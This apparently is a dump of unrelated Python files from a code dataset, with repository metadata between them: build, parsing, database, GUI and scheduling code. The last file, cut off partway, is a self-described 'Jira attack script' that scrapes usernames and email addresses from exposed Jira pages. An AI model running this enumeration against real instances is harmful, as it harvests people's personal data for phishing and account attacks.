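The DefaultBrainSelector in the brainfactory.py record above is a plain round-robin over the configured brains; a small sketch of that behaviour, assuming the programy package is importable and using strings as stand-ins for Brain instances.

from programy.brainfactory import DefaultBrainSelector

brains = {"brain-a": "A", "brain-b": "B"}         # stand-ins for Brain objects
selector = DefaultBrainSelector(None, brains)     # configuration is unused here

# The iterator is reset when it runs out, so selection wraps around.
print([selector.select_brain() for _ in range(3)])   # ['A', 'B', 'A']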
tools/docs/generate_api_rst.py
dcillera/envoy
17703
11838
import os import shutil import sys import tarfile def include_package(envoy_api_protos, rst_file_path, prefix): # `envoy_api_rst_files` is a list of file paths for .proto.rst files # generated by protodoc # # we are only interested in the proto files generated for envoy protos, # not for non-envoy dependencies if ("pkg/" + prefix) not in rst_file_path: return None # derive the "canonical" path from the filepath canonical = f"{rst_file_path.split('pkg/' + prefix)[1]}" # we are only interested in the actual v3 protos, not their dependencies if (prefix + canonical) not in envoy_api_protos: return None return canonical def main(): proto_srcs = sys.argv[1] envoy_api_rst_files = sys.argv[1:-1] output_filename = sys.argv[-1] with open(proto_srcs) as f: # the contents of `proto_srcs` are the result of a bazel genquery, # containing bazel target rules, eg: # # @envoy_api//envoy/watchdog/v3:abort_action.proto # # this transforms them to a list with a "canonical" form of: # # envoy/watchdog/v3/abort_action.proto.rst # envoy_api_protos = [ f"{src.split('//')[1].replace(':', '/')}.rst" for src in f.read().split("\n") if src ] for rst_file_path in envoy_api_rst_files: canonical = include_package(envoy_api_protos, rst_file_path, "envoy/") if canonical is None: canonical = include_package(envoy_api_protos, rst_file_path, "contrib/envoy/") if canonical is None: continue target = os.path.join("rst-out/api-v3", canonical) if not os.path.exists(os.path.dirname(target)): os.makedirs(os.path.dirname(target)) shutil.copy(rst_file_path, target) # output the generated rst files to a tarfile for consumption # by other bazel rules with tarfile.open(output_filename, "w") as tar: tar.add("rst-out", arcname=".") if __name__ == "__main__": main()
2.171875
2
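A short illustration of the canonical-path logic in the generate_api_rst.py record above, with made-up paths: a .proto.rst file is kept only when it sits under the given prefix and its canonical name appears in the allow-list built from the bazel genquery output.

allowed = {"envoy/watchdog/v3/abort_action.proto.rst"}     # invented allow-list
rst_path = "bazel-out/pkg/envoy/watchdog/v3/abort_action.proto.rst"
prefix = "envoy/"

# Same derivation the script performs inside include_package().
canonical = rst_path.split("pkg/" + prefix)[1]   # "watchdog/v3/abort_action.proto.rst"
print((prefix + canonical) in allowed)           # True -> this file gets copied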
src/wa_parser.py
ifly6/NS-WA-Authorboards
0
11839
<reponame>ifly6/NS-WA-Authorboards # Copyright (c) 2020 ifly6 import html import io import re from datetime import datetime from functools import cache from typing import Tuple import numpy as np import pandas as pd import requests from bs4 import BeautifulSoup from lxml import etree from pytz import timezone from ratelimit import limits, sleep_and_retry from helpers import ref from src import wa_cacher """ Imperium Anglorum: This is adapted from proprietary InfoEurope code which in part does most of this already. Eg the proposal portions which translate, the locality adjustments, API reading, etc. There is also code in beta (not-in-production) which would have done this entirely, but I never got around to developing the VIEWS for that portion of the website. It seems much easier just to commit something like this given that all the code is already present. See ifly6.no-ip.org for more information. """ _headers = { 'User-Agent': 'WA parser (Auralia; Imperium Anglorum)' } class ApiError(Exception): pass @sleep_and_retry @limits(calls=25, period=30) # 50 calls every 30 seconds they say but somehow this is fake news def call_api(url) -> str: response = requests.get(url, headers=_headers) if response.status_code != 200: raise ApiError('{} error at api url: {}'.format(response.status_code, str(url))) return response.text def clean_chamber_input(chamber): """ Turns ambiguous chamber information into tuple (int, str) with chamber id and chamber name """ if type(chamber) == str: if chamber == '1': chamber = 1 elif chamber == '2': chamber = 2 elif chamber == 'GA': chamber = 1 elif chamber == 'SC': chamber = 2 chamber_name = 'GA' if chamber == 1 else \ 'SC' if chamber == 2 else '' return chamber, chamber_name def localised(dt: 'datetime', tz='US/Eastern'): return timezone(tz).localize(dt) @cache def _category_map(): d = {'Advancement of Industry': 'Environmental Deregulation', 'Civil Rights': 'Mild', 'Human Rights': 'Mild', 'Education and Creativity': 'Artistic', 'Environmental': 'Automotive', 'Free Trade': 'Mild', 'Furtherment of Democracy': 'Mild', 'Global Disarmament': 'Mild', 'Health': 'Healthcare', 'International Security': 'Mild', 'Moral Decency': 'Mild', 'Political Stability': 'Mild', 'Regulation': 'Consumer Protection', 'Gun Control': 'Tighten', 'Social Justice': 'Mild'} return {ref(k): v for k, v in d.items()} # force ref name for matching # nb that this is identical to dict( ( ref(k), v ) for k, v in d.items() ) def _translate_category(category: str, s: str) -> Tuple[bool, str]: if ref(category) in _category_map() and s == '0': return True, _category_map()[ref(category)] # yield correct name from ref name of category # if it isn't 0, then it doesn't apply, return given # if not in the list, return given return False, s def capitalise(s): s = s.replace('_', ' ').strip() # exceptions capitalisation_exceptions = wa_cacher.load_capitalisation_exceptions() for i in capitalisation_exceptions: if s.strip().lower() == i.strip().lower(): return i # replace with manual correction # only capitalise words longer than 2 letters ('new') and always capitalise first # unless the word is in given list # > fanboys & the s = " ".join( w.capitalize() if (len(w) > 2 and w not in ['for', 'and', 'nor', 'but', 'yet', 'the']) or (i == 0) else w for i, w in enumerate(s.split()) ).strip() # avoid apostrophe capitalisations # but capitalise st -> St for exception in ['St']: s = ' '.join((exception if w.lower() == exception.lower() else w) for w in s.split()) # for split in ['-']: # # as first should always be 
capitalised, not checking doesn't matter # s = split.join(w[:1].upper() + w[1:] for i, w in enumerate(s.split(split))) # capitalise first letter only # "<NAME>" # python str.capitalize forces all other chars to lower # don't use str.capitalize above for numeral in ['ii', 'iii', 'iv', 'v', 'vi', 'vii', 'viii', 'ix', 'x']: s = re.sub(r'(?<=\s){}$'.format(numeral), numeral.upper(), s) # matches only trailing numerals # people used to use WA missions; capitalise these, they are separate words s = re.sub(r'(?<=\s)(Wa|wa|wA)(?=\s)', 'WA', s) # if between two spaces s = re.sub(r'^(Wa|wa|wA)(?=\s)', 'WA', s) # if at start (eg WA Mission of NERV-UN) return s def _get_council(i): if i == 'GA' or i == 1: return 'GA' if i == 'SC' or i == 2: return 'SC' if i == 'UN' or i == 0: return 'UN' raise ValueError(f'provided council code {i} is invalid') class WaPassedResolution: def __init__(self, **kwargs): # core vote information self.resolution_num = None self.title = None self.implementation = None # category and strength self.chamber = None self.category = None self.strength = None # handle repeals self.is_repealed = None self.repealed_by = None self.is_repeal = None self.repeals = None # text self.text = None # ancillary information self.author = None self.coauthor0 = None self.coauthor1 = None self.coauthor2 = None self.votes_for = None self.votes_against = None self.council = None self.__dict__.update(kwargs) # django does this automatically, i'm not updating it; lazy @staticmethod def parse_ga(res_num, council=1): from src.wa_cacher import Cacher try: cacher = Cacher.load() except FileNotFoundError: cacher = Cacher() # init new api_url = 'https://www.nationstates.net/cgi-bin/api.cgi?wa={}&id={}&q=resolution'.format(council, res_num) in_cacher = cacher.contains(api_url) if not in_cacher: this_response = call_api(api_url) cacher.update(api_url, this_response) else: this_response = cacher.get(api_url) xml = etree.parse(io.StringIO(this_response)) if not xml.xpath('/WA/RESOLUTION/NAME'): raise ValueError(f'resolution number {res_num} is invalid; no such resolution exists') resolution_is_repealed = xml.xpath('/WA/RESOLUTION/REPEALED_BY') != [] resolution_is_a_repeal = xml.xpath('/WA/RESOLUTION/REPEALS_COUNCILID') != [] resolution_text = html.unescape(xml.xpath('/WA/RESOLUTION/DESC')[0].text) resolution_author = xml.xpath('/WA/RESOLUTION/PROPOSED_BY')[0].text print(resolution_author) print(type(resolution_author)) if resolution_author is None or str(resolution_author).strip() == '': raise RuntimeError('resolution author is empty') author = capitalise(resolution_author) resolution = WaPassedResolution( council=_get_council(council), resolution_num=res_num, title=xml.xpath('/WA/RESOLUTION/NAME')[0].text, implementation=localised( datetime.utcfromtimestamp(int(xml.xpath('/WA/RESOLUTION/IMPLEMENTED')[0].text)), 'UTC' ).astimezone(timezone('US/Eastern')), # convert to eastern time chamber=clean_chamber_input(xml.xpath('/WA/RESOLUTION/COUNCIL')[0].text)[1], category=capitalise(xml.xpath('/WA/RESOLUTION/CATEGORY')[0].text), strength=capitalise( _translate_category( xml.xpath('/WA/RESOLUTION/CATEGORY')[0].text, # category xml.xpath('/WA/RESOLUTION/OPTION')[0].text # option )[1] # get name ), is_repealed=resolution_is_repealed, repealed_by=int(xml.xpath('/WA/RESOLUTION/REPEALED_BY')[0].text) if resolution_is_repealed else None, is_repeal=resolution_is_a_repeal, repeals=int(xml.xpath('/WA/RESOLUTION/REPEALS_COUNCILID')[0].text) if resolution_is_a_repeal else None, # text and author text=resolution_text.strip(), 
author=author.strip(), # vote data votes_for=int(xml.xpath('/WA/RESOLUTION/TOTAL_VOTES_FOR')[0].text), votes_against=int(xml.xpath('/WA/RESOLUTION/TOTAL_VOTES_AGAINST')[0].text) ) assert resolution.strength != '0', 'resolution {} has strength 0 with category {}'.format( resolution.title, resolution.category ) # overwrite category if repeal with the repeals field; NS API is broken sometimes for some reason if resolution_is_a_repeal: resolution.strength = str(int(resolution.repeals)) # cast to integer # check for co-authors coauth_list = xml.xpath('/WA/RESOLUTION/COAUTHOR/N') if len(coauth_list) != 0: print('received from API coauthors: {}'.format( ', '.join([capitalise(n.text) for n in coauth_list]) )) try: resolution.coauthor0 = capitalise(coauth_list[0].text) except IndexError: pass try: resolution.coauthor1 = capitalise(coauth_list[1].text) except IndexError: pass try: resolution.coauthor2 = capitalise(coauth_list[2].text) except IndexError: pass else: cleaned_resolution_text = resolution_text \ .replace('[i]', '').replace('[/i]', '') \ .replace('[b]', '').replace('[/b]', '') \ .replace('[u]', '').replace('[/u]', '') coauthor_matches = [s for s in cleaned_resolution_text.splitlines() if re.search( r'(Co-?((Author(ed)?:?)|written|writer) ?(by|with)? ?:?)|' r'(This resolution includes significant contributions made by\s+)', s, re.IGNORECASE )] if len(coauthor_matches) > 0: coauthor_line = re.sub(r'Co-?((Author(ed)?:?)|written|writer) ?(by|with)? ?:? ', repl='', string=coauthor_matches[0], flags=re.IGNORECASE) print(f'\tidentified coauthor line: "{coauthor_line}"') coauthor_line = coauthor_line \ .replace('[i]', '') \ .replace('[/i]', '') \ .replace('[b]', '') \ .replace('[/b]', '') \ .replace('[u]', '') \ .replace('[/u]', '') if '[nation' in coauthor_line.lower(): # scion used the [Nation] tag instead of lower case once amended_line = re.sub(r'(?<=\[nation)=(.*?)(?=\])', '', coauthor_line.lower()) # remove 'noflag' etc coauthors = re.findall(r'(?<=\[nation\])(.*?)(?=\[/nation\])', amended_line.lower()) else: # this will break with names like "Sch'tz and West Runk'land" coauthors = re.split(r'(,? and )|(, )', coauthor_line, re.IGNORECASE) coauthors = [i for i in coauthors if i is not None and i.strip() != 'and'] # post facto patching... coauthors = [ref(s).replace('.', '') for s in coauthors] # cast to reference name print(f'\tidentified coauthors as {coauthors}') # pass each co-author in turn ''' While it could be changed so that the original line's capitalisation is preserved, doing this might introduce inconsistency in capitalisation of the same nation. Eg '[nation]imperium_anglorum[/nation]' would be done under capitalisation rules while something provided as 'Imperium ANGLORUM' would be let through. Because some authors use a ref'd name IN the nation tags, something like [nation]transilia[/nation] cannot be disentangled from 'Transilia' if the former is proper and the latter is not. A proper-capitalisation dictionary would be necessary and I am unwilling to download and parse all historical daily dumps for something this minor. 
''' try: resolution.coauthor0 = capitalise(coauthors[0]) except IndexError: pass try: resolution.coauthor1 = capitalise(coauthors[1]) except IndexError: pass try: resolution.coauthor2 = capitalise(coauthors[2]) except IndexError: pass cacher.save() return resolution def get_count() -> int: soup = BeautifulSoup(call_api('http://forum.nationstates.net/viewtopic.php?f=9&t=30'), 'lxml') resolution = soup.select('div#p310 div.content a') return len(resolution) def parse() -> 'pd.DataFrame': # find the number of resolutions from Passed GA Resolutions passed_res_max = get_count() print(f'found {passed_res_max} resolutions') # confirm that we have X resolutions res_list = [] max_res = -1 for i in range(passed_res_max - 1, passed_res_max + 20): # passed resolutions should never be more than 20 behind try: print(f'gettingGA {i + 1} of {passed_res_max} predicted resolutions') d = WaPassedResolution.parse_ga(i + 1).__dict__ # note that 0 returns resolution at vote, need to 1-index res_list.append(d) except ValueError: print('out of resolutions; data should be complete') max_res = i break print(f'found {max_res} resolutions; getting historical') # get API information for each resolution for i in reversed(range(0, passed_res_max - 1)): # passed_res_max is already called above print(f'got {max_res - passed_res_max + i} of {max_res} resolutions') print(f'getting GA {i + 1}') r = WaPassedResolution.parse_ga(i + 1) # note that 0 returns resolution at vote, need to 1-index d = r.__dict__ # hacky cheating to get into dict res_list.append(d) # put it up in pandas df = pd.DataFrame(res_list).replace({None: np.nan}) df.drop(columns=['text'], inplace=True) df.rename(columns={ 'council': 'Council', # Auralia used these names for columns 'resolution_num': 'Number', 'title': 'Title', 'category': 'Category', 'strength': 'Sub-category', 'votes_for': 'Votes For', 'votes_against': 'Votes Against', 'implementation': 'Date Implemented', 'author': 'Author' }, inplace=True) df.sort_values(by='Number', inplace=True) def join_coauthors(coauthor_list, j=', '): """ Removes empty/whitespace-only strings and then joins """ authors = [s for s in coauthor_list if s.strip() != ''] return j.join(authors) df['Co-authors'] = df[['coauthor0', 'coauthor1', 'coauthor2']] \ .replace({np.nan: ''}) \ .agg(join_coauthors, axis=1) assert all(df['Sub-category'] != '0'), 'resolutions {} have sub-category 0'.format( df.loc[df['Sub-category'] != '0', 'Title'].values ) return df[['Number', 'Title', 'Category', 'Sub-category', 'Author', 'Co-authors', 'Votes For', 'Votes Against', 'Date Implemented']].copy() # take only relevant vars
2.75
3
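Two of the small pure helpers in the wa_parser.py record above lend themselves to a quick sketch (assuming src.wa_parser imports with its dependencies installed): chamber codes normalise to an (id, name) pair and council ids map to their short names.

from src.wa_parser import clean_chamber_input, _get_council

print(clean_chamber_input("GA"))   # (1, 'GA')
print(clean_chamber_input(2))      # (2, 'SC')
print(_get_council(0))             # 'UN'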
conans/search/binary_html_table.py
matthiasng/conan
2
11840
import os from collections import OrderedDict, defaultdict from conans.model.ref import PackageReference from conans.util.files import save class RowResult(object): def __init__(self, remote, reference, data): self.remote = remote self.reference = reference self._data = data @property def recipe(self): return self.reference @property def package_id(self): return self._data['id'] @property def outdated(self): return self._data['outdated'] def row(self, headers): """ Returns package data according to headers """ assert isinstance(headers, Headers), "Wrong type: {}".format(type(headers)) for it in headers.keys: try: yield getattr(self, it) except AttributeError: yield self._data[it] for it in headers.settings: yield self._data['settings'].get(it, None) for it in headers.options: yield self._data['options'].get(it, None) if headers.requires: prefs = [PackageReference.loads(it) for it in self._data['requires']] yield ', '.join(map(str, [it.ref for it in prefs])) class Headers(object): _preferred_ordering = ['os', 'arch', 'compiler', 'build_type'] def __init__(self, settings, options, requires, keys): # Keys: columns to classify self.keys = keys self.options = options self.requires = requires # - Order settings _settings = defaultdict(list) for it in settings: try: category, _ = it.split('.', 1) except ValueError: _settings[it].append(it) else: _settings[category].append(it) self.settings = [] for it in self._preferred_ordering: if it in _settings: self.settings.extend(sorted(_settings[it])) for it, values in _settings.items(): if it not in self._preferred_ordering: self.settings.extend(sorted(values)) def row(self, n_rows=2): """ Retrieve list of headers as a single list (1-row) or as a list of tuples with settings organized by categories (2-row). Example output: 1-row: ['os', 'arch', 'compiler', 'compiler.version', 'compiler.libcxx', 'build_type'] 2-row: [('os', ['']), ('arch', ['']), ('compiler', ['', 'version', 'libcxx']),] """ headers = list(self.keys) if n_rows == 1: headers.extend(self.settings + self.options) if self.requires: headers.append('requires') return headers elif n_rows == 2: headers = [(it, ['']) for it in headers] settings = self._group_settings(self.settings) headers.extend(settings) headers.append(('options', self.options)) if self.requires: headers.append(('requires', [''])) return headers else: raise NotImplementedError("not yet") @staticmethod def _group_settings(settings): """ From one row to two-rows using '.' 
as separator """ ret = OrderedDict() for setting in settings: try: category, value = setting.split(".", 1) except ValueError: ret.setdefault(setting, []).append('') else: ret.setdefault(category, []).append(value) return [(key, values) for key, values in ret.items()] class Results(object): def __init__(self, results): self._results = results # Collect data inspecting the packages _settings = set() _options = set() _remotes = set() self.requires = False for it in results: _remotes.add(it['remote']) for p in it['items'][0]['packages']: _settings = _settings.union(list(p['settings'].keys())) _options = _options.union(list(p['options'].keys())) if len(p['requires']): self.requires = True self.settings = list(_settings) self.options = list(_options) self.remotes = list(_remotes) def get_headers(self, keys=('remote', 'reference', 'outdated', 'package_id')): return Headers(self.settings, self.options, self.requires, keys=keys) def packages(self): for it in self._results: remote = it['remote'] reference = it['items'][0]['recipe']['id'] for p in it['items'][0]['packages']: r = RowResult(remote, reference, p) yield r def html_binary_graph(search_info, reference, table_filename, template): # Adapt data to the template (think twice about the format before documenting) search = {'reference': str(reference)} results = Results(search_info) # Render and save template_folder = os.path.dirname(template.filename) content = template.render(search=search, results=results, base_template_path=template_folder) save(table_filename, content)
2.40625
2
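The two-row header layout in the binary_html_table.py record above hinges on Headers._group_settings; a sketch of that grouping on a typical settings list (the list itself is invented for illustration, and the import assumes a Conan checkout on the path).

from conans.search.binary_html_table import Headers

grouped = Headers._group_settings(
    ["os", "arch", "compiler", "compiler.version", "compiler.libcxx", "build_type"]
)
print(grouped)
# [('os', ['']), ('arch', ['']), ('compiler', ['', 'version', 'libcxx']), ('build_type', [''])]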
irancovid-19.py
AmiiirCom/irancovid-19
0
11841
<reponame>AmiiirCom/irancovid-19
from covid import Covid
import json

covid = Covid(source="worldometers")
covid.get_data()

iran_casses = covid.get_status_by_country_name("iran")

confirmed = iran_casses['confirmed']
new_cases = iran_casses['new_cases']
deaths = iran_casses['deaths']
recovered = iran_casses['recovered']
active = iran_casses['active']
critical = iran_casses['critical']
new_deaths = iran_casses['new_deaths']
total_tests = iran_casses['total_tests']
total_tests_per_million = int(iran_casses['total_tests_per_million'])
total_cases_per_million = int(iran_casses['total_cases_per_million'])
total_deaths_per_million = int(iran_casses['total_deaths_per_million'])
population = int(iran_casses['population'])

pr = json.dumps({
    'confirmed': confirmed,
    'new_cases': new_cases,
    'deaths': deaths,
    'recovered': recovered,
    'active': active,
    'critical': critical,
    'new_deaths': new_deaths,
    'total_tests': total_tests,
    'total_tests_per_million': total_tests_per_million,
    'total_cases_per_million': total_cases_per_million,
    'total_deaths_per_million': total_deaths_per_million,
    'population': population
})

print(pr)
2.703125
3
models/__init__.py
esentino/literate-doodle
0
11842
<reponame>esentino/literate-doodle<gh_stars>0 # models/__init__.py from clcrypto import password_hash from psycopg2 import connect def make_connection(db_name='w3'): cnx = connect(user='postgres', password='<PASSWORD>', database=db_name, host='localhost') cnx.autocommit = True return cnx class User: __id = None username = None __hashed_password = None email = None def __init__(self): self.__id = -1 self.username = "" self.email = "" self.__hashed_password = "" @property def id(self): return self.__id @property def hashed_password(self): return self.__hashed_password def set_password(self, password, salt): self.__hashed_password = password_hash(password, salt) def save_to_db(self, cursor): if self.__id == -1: # saving new instance using prepared statements sql = """INSERT INTO Users(username, email, hashed_password) VALUES(%s, %s, %s) RETURNING id""" values = (self.username, self.email, self.hashed_password) cursor.execute(sql, values) self.__id = cursor.fetchone()[0] # albo cursor.fetchone()['id'] return True else: sql = """UPDATE Users SET username=%s, email=%s, hashed_password=%s WHERE id=%s""" values = (self.username, self.email, self.hashed_password, self.id) cursor.execute(sql, values) return True @staticmethod def load_user_by_id(cursor, user_id): sql = "SELECT id, username, email, hashed_password FROM users WHERE id=%s" cursor.execute(sql, (user_id,)) # (user_id, ) - bo tworzymy krotkę data = cursor.fetchone() if data: loaded_user = User() loaded_user.__id = data[0] loaded_user.username = data[1] loaded_user.email = data[2] loaded_user.__hashed_password = data[3] return loaded_user else: return None @staticmethod def find_by_email(cursor, username): sql = "SELECT id, username, email, hashed_password FROM users WHERE email=%s" cursor.execute(sql, (username,)) # (user_id, ) - bo tworzymy krotkę data = cursor.fetchone() if data: loaded_user = User() loaded_user.__id = data[0] loaded_user.username = data[1] loaded_user.email = data[2] loaded_user.__hashed_password = data[3] return loaded_user else: return None @staticmethod def find_all( cursor): sql = "SELECT id, username, email, hashed_password FROM Users" ret = [] cursor.execute(sql) for row in cursor.fetchall(): loaded_user = User() loaded_user.__id = row[0] loaded_user.username = row[1] loaded_user.email = row[2] loaded_user.__hashed_password = row[3] ret.append(loaded_user) return ret def delete(self, cursor): sql = "DELETE FROM Users WHERE id=%s" cursor.execute(sql, (self.__id,)) self.__id = -1 return True
3.078125
3
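A hedged sketch of the intended round trip for the User model in the models/__init__.py record above: save a new row and re-load it by id. It assumes a local PostgreSQL database with the Users table already created and the project's clcrypto.password_hash helper; the salt argument here is a guess, since its handling lives in clcrypto.

from models import make_connection, User

cnx = make_connection()
cursor = cnx.cursor()

user = User()
user.username = "alice"                  # invented example data
user.email = "alice@example.org"
user.set_password("correct horse", salt=None)   # salt semantics defined by clcrypto
user.save_to_db(cursor)

same_user = User.load_user_by_id(cursor, user.id)
print(same_user.email)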
crys3d/command_line/model_viewer.py
rimmartin/cctbx_project
0
11843
from __future__ import division # LIBTBX_PRE_DISPATCHER_INCLUDE_SH export PHENIX_GUI_ENVIRONMENT=1 # LIBTBX_PRE_DISPATCHER_INCLUDE_SH export BOOST_ADAPTBX_FPE_DEFAULT=1 import cStringIO from crys3d.wx_selection_editor import selection_editor_mixin import wx import libtbx.load_env import sys, os, time ######################################################################## # CLASSES AND METHODS FOR STANDALONE VIEWER # class App (wx.App) : def __init__ (self, title="crys3d.wx_model_viewer", default_size=(800,600), viewer_class=selection_editor_mixin) : self.title = title self.default_size = default_size self.viewer_class = viewer_class wx.App.__init__(self, 0) def OnInit (self) : self.frame = wx.Frame(None, -1, self.title, pos=wx.DefaultPosition, size=self.default_size) self.frame.CreateStatusBar() box = wx.BoxSizer(wx.VERTICAL) self.view_objects = self.viewer_class(self.frame, size=(800,600)) box.Add(self.view_objects, wx.EXPAND, wx.EXPAND) self.frame.SetSizer(box) box.SetSizeHints(self.frame) return True def run (args, viewer_class=selection_editor_mixin) : import cStringIO pdb_files = [] cif_files = [] show_ss_restraints = False fast_connectivity = True for arg in args : if os.path.isfile(arg) : import iotbx.pdb if iotbx.pdb.is_pdb_file(arg) : pdb_files.append(os.path.abspath(arg)) elif arg.endswith(".cif") : cif_files.append(os.path.abspath(arg)) elif arg == "--ss" : show_ss_restraints = True elif arg in ["--thorough", "--slow", "--use_monomer_library"] : fast_connectivity = False if len(pdb_files) == 0 : print "Please specify a PDB file (and optional CIFs) on the command line." return a = App(viewer_class=viewer_class) a.frame.Show() out = sys.stdout if not "--debug" in args : out = cStringIO.StringIO() for file_name in pdb_files : print "Reading PDB file %s" % file_name from iotbx import file_reader from mmtbx.monomer_library import pdb_interpretation from mmtbx import secondary_structure t1 = time.time() if fast_connectivity : pdb_in = file_reader.any_file(file_name, force_type="pdb") pdb_hierarchy = pdb_in.file_object.hierarchy atomic_bonds = pdb_hierarchy.distance_based_simple_two_way_bond_sets() acp_selection = None else : processed_pdb_file = pdb_interpretation.run(args=[file_name]+cif_files, log=out) pdb_hierarchy = processed_pdb_file.all_chain_proxies.pdb_hierarchy pdb_hierarchy.atoms().reset_i_seq() grm = processed_pdb_file.geometry_restraints_manager() acp_selection = processed_pdb_file.all_chain_proxies.selection if grm is None or grm.shell_sym_tables is None : raise Sorry("Atomic bonds could not be calculated for this model. 
"+ "This is probably due to a missing CRYST1 record in the PDB file.") atomic_bonds = grm.shell_sym_tables[0].full_simple_connectivity() t2 = time.time() print "%.2fs" % (t2-t1) a.view_objects.add_model(file_name, pdb_hierarchy, atomic_bonds, mmtbx_selection_function=acp_selection) sec_str = secondary_structure.manager( pdb_hierarchy=pdb_hierarchy, xray_structure=None) a.view_objects.set_sec_str(file_name, sec_str.selections_as_ints()) if show_ss_restraints and acp_selection is not None : bonds_table = secondary_structure.process_structure(params=None, processed_pdb_file=processed_pdb_file, tmp_dir=os.getcwd(), log=sys.stderr) a.view_objects.set_noncovalent_bonds(file_name, bonds_table.bonds) a.view_objects.flag_show_noncovalent_bonds = True a.view_objects.set_model_base_color([1.0,1.0,1.0], file_name) a.view_objects.set_color_mode("element") a.view_objects.force_update(recenter=True) a.MainLoop() if __name__ == "__main__" : if "--test" in sys.argv : pdb_file = libtbx.env.find_in_repositories( relative_path="phenix_regression/pdb/1ywf.pdb", test=os.path.isfile) run([pdb_file, "--ss"]) else : run(sys.argv[1:])
1.78125
2
Crypto/py3compat.py
eddiejessup/transcrypt
14
11844
<reponame>eddiejessup/transcrypt
__revision__ = "$Id$"

def b(s):
    return s.encode("latin-1")

def bchr(s):
    return bytes([s])

def bstr(s):
    if isinstance(s, str):
        return bytes(s, "latin-1")
    else:
        return bytes(s)

def bord(s):
    return s

def tobytes(s):
    if isinstance(s, bytes):
        return s
    else:
        if isinstance(s, str):
            return s.encode("latin-1")
        else:
            return bytes(s)

def tostr(bs):
    return bs.decode("latin-1")

from io import BytesIO
2.484375
2
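The compatibility shim in the Crypto/py3compat.py record above funnels everything through latin-1; a quick sketch of the conversions, assuming the module is importable under its repository path.

from Crypto.py3compat import b, bchr, bord, tobytes, tostr

assert b("abc") == b"abc"
assert bchr(65) == b"A"
assert bord(65) == 65                    # identity on Python 3
assert tobytes("hé") == b"h\xe9"         # latin-1 encoding
assert tostr(b"caf\xe9") == "café"       # latin-1 decoding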
verres/optim/schedule.py
csxeba/Verres
0
11845
from typing import Dict import numpy as np import tensorflow as tf import verres as V class ConstantSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, learning_rate: float): super().__init__() self.learning_rate = float(learning_rate) def __call__(self, step): return self.learning_rate def get_config(self): return dict(learning_rate=self.learning_rate) class LinearLRSchedule(tf.keras.callbacks.Callback): def __init__(self, cycle_length: int, steps_per_epoch: int, lr_map: Dict[int, float], initial_lr: float = None): super().__init__() self.schedule = None self.pointer = 0 self.cycle_length = None self.make_schedule(cycle_length, steps_per_epoch, lr_map, initial_lr) def make_schedule(self, cycle_length: int, steps_per_epoch: int, lr_map: Dict[int, float], initial_lr: float = None): self.cycle_length = cycle_length schedule = np.empty(self.cycle_length * steps_per_epoch, dtype="float32") if 0 not in lr_map: if initial_lr is None: raise RuntimeError("Either pass the initial learning rate in the lr_map or as a dedicated parameter!") else: lr_map = lr_map.copy() initial_lr = lr_map.pop(0) start_step = 0 current_lr = initial_lr for end_epoch, next_lr in sorted(lr_map.items(), key=lambda it: it[0]): steps = end_epoch * steps_per_epoch - start_step schedule[start_step:start_step+steps] = np.linspace( current_lr, next_lr, num=steps, endpoint=False, dtype="float32") start_step += steps current_lr = next_lr schedule[start_step:] = current_lr self.schedule = schedule def on_batch_end(self, batch, logs=None): self.model.optimizer.lr = self.schedule[self.pointer] self.pointer += 1 self.pointer %= self.cycle_length def on_epoch_end(self, epoch, logs=None): logs["lr"] = self.schedule[self.pointer] def factory(spec: dict) -> tf.optimizers.schedules.LearningRateSchedule: name = spec.pop("name", "default") if name.lower() in {"default", "constant"}: scheduler = ConstantSchedule(float(spec["learning_rate"])) else: scheduler_type = getattr(tf.optimizers.schedules, name, None) if scheduler_type is None: raise KeyError(f"No such scheduler: {name}") scheduler = scheduler_type(**spec) print(f" [Verres.schedule] - Factory built: {name}") return scheduler
2.5625
3
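A sketch of what LinearLRSchedule in the verres schedule.py record above precomputes, with invented numbers: the per-step learning-rate array ramps linearly between the epochs named in lr_map and then holds. The callback itself is only exercised by Keras during model.fit, but the array can be inspected directly.

from verres.optim.schedule import LinearLRSchedule

cb = LinearLRSchedule(
    cycle_length=4,              # epochs per cycle (invented)
    steps_per_epoch=10,
    lr_map={0: 1e-3, 2: 1e-4},   # start at 1e-3, reach 1e-4 at epoch 2, then hold
)
print(cb.schedule.shape)                                  # (40,)
print(cb.schedule[0], cb.schedule[20], cb.schedule[-1])   # ~0.001 0.0001 0.0001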
JIG.py
mmg1/JIG
28
11846
<reponame>mmg1/JIG import re import sys from itertools import izip as zip import argparse import requests # argparse definitions parser = argparse.ArgumentParser(description='Jira attack script') parser.add_argument('URL', type=str , help='the URL of the Jira instance... ex. https://jira.organization.com/') parser.add_argument('-u' ,'--usernames', dest='names', action='store_const', const=True, help='Print discovered usernames') parser.add_argument('-e' , '--emails', dest='emails',action='store_const', const=True, help='Print discovered email addresses') parser.add_argument('-a' ,'--all', dest='all',action='store_const',const=True,help='Print discovered email addresses and usernames') parser.add_argument('-eu' , dest='all',action='store_const',const=True,help=argparse.SUPPRESS) parser.add_argument('-ue' , dest='all',action='store_const',const=True,help=argparse.SUPPRESS) args = parser.parse_args() url = args.URL if args.URL[-1] != '/': args.URL = args.URL + "/" # Define URLs pickerURL = args.URL + "secure/popups/UserPickerBrowser.jspa?max=9999" filtersURL = args.URL + "secure/ManageFilters.jspa?filter=popular" #dashboardURL = args.URL + "secure/Dashboard.jspa" def extractPicker(response): ''' Takes in the response body for UserBrowserPicker and returns a dictionary containing usernames and email addresses. ''' userList = re.compile(r"-name\">(.*)</td>").findall(response.text) emailList = re.compile(r">(.*\@.*)</td>").findall(response.text) dictionary = dict(zip(userList , emailList)) return dictionary def extractFilters(response): ''' Takes in the response body for the manage filters page and returns a list containing usernames. ''' userList = re.compile(r"</span>.\((.*)\)").findall(response.text) return list(set(userList)) def validateURL(url): ''' Runs a stream of validation on a given URL and returns the response and a boolean value. ''' try: s = requests.Session() validateresponse = s.get(url , allow_redirects=False,timeout=5) except requests.exceptions.InvalidSchema: print "" print "[-] Invalid schema provided... Must follow format https://jira.organization.com/" print "" sys.exit(1) except requests.exceptions.MissingSchema: print "" print "[-] A supported schema was not provided. Please use http:// or https://" print "" sys.exit(1) except requests.exceptions.InvalidURL: print "[-] Invalid base URL was supplied... Please try again." sys.exit(1) except requests.exceptions.ConnectionError: print "" print "[-] Connection failed... Please check the URL and try again." print "" sys.exit(1) except requests.exceptions.RequestException: print "" print "[-] An unknown exception occurred... Please try again." print "" sys.exit(1) if validateresponse.status_code == 200: return validateresponse,True else: return "[-] The page is inaccessible",False if __name__ == "__main__": pickerResponse,pickerAccessible = validateURL(pickerURL) 